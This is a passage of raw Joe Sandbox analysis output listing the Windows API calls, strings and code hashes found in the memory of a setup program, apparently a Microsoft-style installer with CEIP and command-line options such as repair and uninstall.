                                                                                              • API ID: ByteCharMultiWide$H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 692526729-0
                                                                                              • Opcode ID: 6db3873be8ab953ff8db24611959aed2fcff45d69818b4fc01d0e1dce50a813e
                                                                                              • Instruction ID: 25dfa280b0944579696f87bafe45d7a5d4824481ab269aa18a93456f5b12020f
                                                                                              • Opcode Fuzzy Hash: 6db3873be8ab953ff8db24611959aed2fcff45d69818b4fc01d0e1dce50a813e
                                                                                              • Instruction Fuzzy Hash: FEE0123521122467DF117F548A01BCE33516F3175CF10C451E9906FF54CB39CA2AD6A9
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: cbce3b873b0349ae179a95f7d3459a0316183ebd2a4742c3d6ef460cec69feeb
                                                                                              • Instruction ID: 3d3b7ad7377602d4f77692a1e555f56c5ecef68e9d72c7eae29f6a94bf8b0912
                                                                                              • Opcode Fuzzy Hash: cbce3b873b0349ae179a95f7d3459a0316183ebd2a4742c3d6ef460cec69feeb
                                                                                              • Instruction Fuzzy Hash: ABE0123521521867DF116F648A11BCE33116F3175CF11C441E8906FF54C739CA2AD6A9
                                                                                              APIs
                                                                                              • EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6394FF21
                                                                                                • Part of subcall function 6395007B: SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000003,?,?), ref: 639500A9
                                                                                                • Part of subcall function 6395007B: SetWindowPos.USER32(0000000C,?,00000000,00000000,00000000,00000000,00000003,?,?), ref: 639500E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ChildEnumWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1604351572-0
                                                                                              • Opcode ID: b7cec41c10ea59afec7e12e1faa0bb4b6fad3ca17ffdfcc471101db60a95e463
                                                                                              • Instruction ID: 79a2b8b16d1976c2cf5cff334024281276a8c834895a29fe6faf6238d2a959bb
                                                                                              • Opcode Fuzzy Hash: b7cec41c10ea59afec7e12e1faa0bb4b6fad3ca17ffdfcc471101db60a95e463
                                                                                              • Instruction Fuzzy Hash: AAC08C3A0062307B47303A306808C9B29C9AE93AA83050081B001810124B10CC52CEE0
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C925505
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: d568c9f499b653ec89d8e7fdd0bdebda28bdd9dce116ba7bad7de47fbca2cd5f
                                                                                              • Instruction ID: c0ef8afaa7a11b34c6cb1cb58e918e67d1c9131dc2f32c834d3bd9013cbbf4b9
                                                                                              • Opcode Fuzzy Hash: d568c9f499b653ec89d8e7fdd0bdebda28bdd9dce116ba7bad7de47fbca2cd5f
                                                                                              • Instruction Fuzzy Hash: 42C08C32041608FBCF224E80DC09F9ABF6AEB85358F24C020B61C098A0C776D5A1DAC4
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,?,?,6C8CB029,?,0000002C,6C90D55B,?,?,?,?,00000001), ref: 6C8F91C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID:
                                                                                              • API String ID: 542301482-0
                                                                                              • Opcode ID: 4856d69a9f70c1799a475e2b1162a6d5427bde45de71847a375c7f3b67c8efdd
                                                                                              • Instruction ID: 6cc0d4023d1fe1ac11881130ea2c7534691745a655e8a5d2ec8d74e8687ef2a1
                                                                                              • Opcode Fuzzy Hash: 4856d69a9f70c1799a475e2b1162a6d5427bde45de71847a375c7f3b67c8efdd
                                                                                              • Instruction Fuzzy Hash: 18C02B3218020CFBC73005C1DC05FE9BE29D7C5754F014811F318347828671B410F5A9
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C9254E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 51ef4869f51948533519c9a7db4b9113c90136ebed2ac435697349f06da90c0d
                                                                                              • Instruction ID: c7955d3eac8c0537399203bacb28f23c29ab8a65d7a47aaca98cd0af1aca4fb8
                                                                                              • Opcode Fuzzy Hash: 51ef4869f51948533519c9a7db4b9113c90136ebed2ac435697349f06da90c0d
                                                                                              • Instruction Fuzzy Hash: B5C09B36140108F7CB111EC1DC05F45BF69D795755F14C061F60805452C777D421D6D4
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,6C8FA320,38D98A99,?,?), ref: 6C8CC55E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1452528299-0
                                                                                              • Opcode ID: 9378503ebce091921dad03cd518232b03ea10dd0e97cea9a1f55a21fb2e31c76
                                                                                              • Instruction ID: 25dbc049d17dd5aa6af42ecc193cd53f5e059019d99194a09c2fce7b639c3823
                                                                                              • Opcode Fuzzy Hash: 9378503ebce091921dad03cd518232b03ea10dd0e97cea9a1f55a21fb2e31c76
                                                                                              • Instruction Fuzzy Hash: B211A572751301AFE734DF35DA16B2A7BF4AB00754F10892DE207DAAD0DBB4E5448B44
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D42CF
                                                                                                • Part of subcall function 6C5D443B: LoadLibraryW.KERNEL32(SensApi.dll,00000000,?), ref: 6C5D4452
                                                                                                • Part of subcall function 6C5D443B: GetProcAddress.KERNEL32(00000000,IsNetworkAlive), ref: 6C5D4468
                                                                                                • Part of subcall function 6C5D443B: FreeLibrary.KERNEL32(00000000), ref: 6C5D447F
                                                                                                • Part of subcall function 6C5D3E29: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C5D3E94
                                                                                                • Part of subcall function 6C5D3E29: RegQueryValueExW.ADVAPI32(00000000,00000002,00000000,?,?,00000004), ref: 6C5D3EB0
                                                                                                • Part of subcall function 6C5D3E29: RegCloseKey.ADVAPI32(00000000), ref: 6C5D3ECE
                                                                                              • EnterCriticalSection.KERNEL32(00000030,?,00000104,?,80000002,Software\Microsoft\SQMClient,DoNotDeleteFileAfterUpload,?,00000000,?,6C5F0168), ref: 6C5D434C
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,6C5F0168), ref: 6C5D4392
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,6C5F0168), ref: 6C5D43CD
                                                                                              • ctype.LIBCPMT ref: 6C5D43F5
                                                                                              • FindNextFileW.KERNEL32(?,00000010,?,6C5F0168), ref: 6C5DB9A3
                                                                                              • FindClose.KERNEL32(?,?,6C5F0168), ref: 6C5DB9BD
                                                                                              • ResetEvent.KERNEL32(?,?,6C5F0168), ref: 6C5DB9DD
                                                                                              • CreateThread.KERNEL32(00000000,00000000,6C5DBC8D,00000000,00000000,00000054), ref: 6C5DB9FB
                                                                                                • Part of subcall function 6C5DB850: realloc.MSVCRT ref: 6C5DB88E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseCriticalFileLibrarySection$AddressCreateEnterEventFirstFreeLeaveLoadNextOpenProcQueryResetThreadValuectypememsetrealloc
                                                                                              • String ID: DoNotDeleteFileAfterUpload$Software\Microsoft\SQMClient$W
                                                                                              • API String ID: 746345222-799691104
                                                                                              • Opcode ID: fa326b21fe891e0b2c22720e0af9a182a8f312d1ef63a434e43c85b9b1667073
                                                                                              • Instruction ID: 70ccea867fb42956c5d8b6fea1a83bd7f69d96f095f751d12d05567e582d8bdc
                                                                                              • Opcode Fuzzy Hash: fa326b21fe891e0b2c22720e0af9a182a8f312d1ef63a434e43c85b9b1667073
                                                                                              • Instruction Fuzzy Hash: 7EB1B0B0500399DFCB50DF28CC84F9AB7B5BB49308F5205AAE628D6A61D731ED84CF48
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5E80D6
                                                                                              • memset.MSVCRT ref: 6C5E80EF
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,1000FFFF,00000000), ref: 6C5E81D8
                                                                                                • Part of subcall function 6C5E99F8: EtwTraceMessage.NTDLL ref: 6C5E9A13
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$FileFindFirstMessageTrace_vsnwprintf
                                                                                              • String ID: %s\%s$W
                                                                                              • API String ID: 675349215-3036690452
                                                                                              • Opcode ID: 8b5d50bec31e19970d4fb3d80b1eeaf3aa67da4cde0c90e7fe580bf3b7c8c630
                                                                                              • Instruction ID: a907f1a6f96c9472000dc37bb051537a2979d0f81e6b89b0e62cddd920b509ee
                                                                                              • Opcode Fuzzy Hash: 8b5d50bec31e19970d4fb3d80b1eeaf3aa67da4cde0c90e7fe580bf3b7c8c630
                                                                                              • Instruction Fuzzy Hash: AD51C2B0940258EFCB14CF58CC84F9B7BB9AB49308F5501D6E515E69A2D331DD88CF5A
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63966821
                                                                                              • GetLastError.KERNEL32(00000008,639650A0,?,00000000,00000000,?,?,63958DC8,?,%1!I64u!,?,?), ref: 63966834
                                                                                              • SetLastError.KERNEL32(00000000,?,63958DC8,?,%1!I64u!,?,?), ref: 63966840
                                                                                              • FormatMessageW.KERNEL32(00000500,00000000,00000000,00000000,205ABF9D,00000000,205ABF9D,?,63958DC8,?,%1!I64u!,?,?), ref: 63966854
                                                                                              • GetLastError.KERNEL32(?,63958DC8,?,%1!I64u!,?,?), ref: 6396685A
                                                                                              • SetLastError.KERNEL32(?,?,63958DC8,?,%1!I64u!,?,?), ref: 63966868
                                                                                              • LocalFree.KERNEL32(205ABF9D,?,205ABF9D,?,63958DC8,?,%1!I64u!,?,?), ref: 63966878
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FormatFreeH_prolog3LocalMessage
                                                                                              • String ID:
                                                                                              • API String ID: 69132360-0
                                                                                              • Opcode ID: 695db9bddde587e62958a90f4067b3cf19ef87ef52e9ec2be88e5c7a6d84662b
                                                                                              • Instruction ID: aa2aff5e8836b40531b1732cdb618900b05c3ba8efb0996820ad288bdb9c9bf3
                                                                                              • Opcode Fuzzy Hash: 695db9bddde587e62958a90f4067b3cf19ef87ef52e9ec2be88e5c7a6d84662b
                                                                                              • Instruction Fuzzy Hash: ACF0F931804259EFDF10BFA6CD44DAFBF79FFA6B45F00401AA510A60A1CB718921DF61
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6396AEFE
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6396AF13
                                                                                              • UnhandledExceptionFilter.KERNEL32(63941540), ref: 6396AF1E
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 6396AF3A
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 6396AF41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 2579439406-0
                                                                                              • Opcode ID: 6c206577d15600410268c7b041ff2451586976b99d6768ecade77c791a995895
                                                                                              • Instruction ID: 86f8facd7d03ba7673dd61b47e1791eba2b0d633f49bca73d05b0ff387387624
                                                                                              • Opcode Fuzzy Hash: 6c206577d15600410268c7b041ff2451586976b99d6768ecade77c791a995895
                                                                                              • Instruction Fuzzy Hash: 1F21CEB888A3049FDB05FF65D4686443BF4FB8B305F10581AE8898B342E7B196808F55
                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6394EFFE
                                                                                              • _memset.LIBCMT ref: 6394F018
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 6394F032
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 6394F04D
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6394F061
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                              • String ID:
                                                                                              • API String ID: 2526126748-0
                                                                                              • Opcode ID: 61abf4132bedaa628240f7036c0f0ca82ecf2d71bbb79c69b1d9a5df6909e42b
                                                                                              • Instruction ID: cec45905bc4244fdd566009adfac992c28238ab20b1f768f0369d24d12117d31
                                                                                              • Opcode Fuzzy Hash: 61abf4132bedaa628240f7036c0f0ca82ecf2d71bbb79c69b1d9a5df6909e42b
                                                                                              • Instruction Fuzzy Hash: 3901CC31902028AFDB10EB65D88CEAE7BB8EB87B58F400195E816D7181CB70DA45CEA1
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C5EA4E6
                                                                                              • UnhandledExceptionFilter.KERNEL32(6C5EA50C), ref: 6C5EA4F1
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 6C5EA4FC
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 6C5EA503
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 3231755760-0
                                                                                              • Opcode ID: bf4f98b3e34cd31425ead02703af0e1b73b2d33b92f2d4979a0f34c70456a9d1
                                                                                              • Instruction ID: ef7575115a552d2cb967b642780551603d10ff0b9fb7b3ec90fa40374710301e
                                                                                              • Opcode Fuzzy Hash: bf4f98b3e34cd31425ead02703af0e1b73b2d33b92f2d4979a0f34c70456a9d1
                                                                                              • Instruction Fuzzy Hash: E121BFB4A063859FCF49EF19EC85A457BB4BB8A324B9A811BE429C3350E7709540CF2C
                                                                                              APIs
                                                                                              • LoadResource.KERNEL32(?,?,?,?,6395F053,?,00000000,?,6395F018,00000000,?,00000000,?,?), ref: 63967A1E
                                                                                              • LockResource.KERNEL32(00000000,63982F8C,?,6395F053,?,00000000,?,6395F018,00000000,?,00000000,?,?), ref: 63967A2A
                                                                                              • SizeofResource.KERNEL32(?,?,?,6395F053,?,00000000,?,6395F018,00000000,?,00000000,?,?), ref: 63967A3C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$LoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 2853612939-0
                                                                                              • Opcode ID: 4d8f0885f354786ceea67ec516483c9618f79375ef121717b049c5ddde898f72
                                                                                              • Instruction ID: 19fa1bc634891cd215b94a060bca40e43102cee11e4d064529ef59b7fa522ee1
                                                                                              • Opcode Fuzzy Hash: 4d8f0885f354786ceea67ec516483c9618f79375ef121717b049c5ddde898f72
                                                                                              • Instruction Fuzzy Hash: DFF0F633211016ABBF112B2ACC048797BAAEBC3BA13098426F818D6100E732C670DEA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 74b5f1cc7ec8c357c34dc84f79a000ff659a75e498c54a868e1ae8fc38274e75
                                                                                              • Instruction ID: 955c80c0af15451080ba75e3d557239c266114de0625dc4045f582fd4f1097e7
                                                                                              • Opcode Fuzzy Hash: 74b5f1cc7ec8c357c34dc84f79a000ff659a75e498c54a868e1ae8fc38274e75
                                                                                              • Instruction Fuzzy Hash: 37F054345093468FC7018B34885585AFBB19F8B16470595978446CF962D534EC898755
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394BE0A
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6395F35E: __EH_prolog3.LIBCMT ref: 6395F365
                                                                                                • Part of subcall function 6395F35E: __recalloc.LIBCMT ref: 6395F3A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$__recalloc
                                                                                              • String ID: CEIPconsent$NoSetupVersionCheck$chainingpackage$createlayout$lcid$log$msioptions$norestart$parameterfolder$passive$pipe$promptrestart$repair$serialdownload$showfinalerror$uninstall$uninstallpatch
                                                                                              • API String ID: 1900422986-634121796
                                                                                              • Opcode ID: 526fd40aa0519b7680617d8f43f02707d097a82e2ee930527c1e83e1d648515f
                                                                                              • Instruction ID: ddd03d7fe401b907ac51995177a55f6d7a821ca84f2ab2d568a5fcd620da7379
                                                                                              • Opcode Fuzzy Hash: 526fd40aa0519b7680617d8f43f02707d097a82e2ee930527c1e83e1d648515f
                                                                                              • Instruction Fuzzy Hash: 05A117B180535DDBEB11D7F8C9806EDB7B4AF2672CF184588E024A3282D775D6989F32
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395D150
                                                                                                • Part of subcall function 6394C419: __EH_prolog3.LIBCMT ref: 6394C420
                                                                                                • Part of subcall function 6394C419: GetModuleFileNameW.KERNEL32(63940000,00000010,00000104), ref: 6394C46D
                                                                                                • Part of subcall function 6395F21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,6394C3AE), ref: 6395F241
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6395D198
                                                                                              • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 6395D1AF
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6395D1E4
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 6395D1F5
                                                                                              • SendMessageW.USER32(00000000,00000170,?,00000000), ref: 6395D209
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6395D231
                                                                                              • GetDlgItem.USER32(?,00000069), ref: 6395D242
                                                                                              • SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 6395D256
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6395D27E
                                                                                              • GetDlgItem.USER32(?,0000006A), ref: 6395D28F
                                                                                              • SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 6395D2A3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
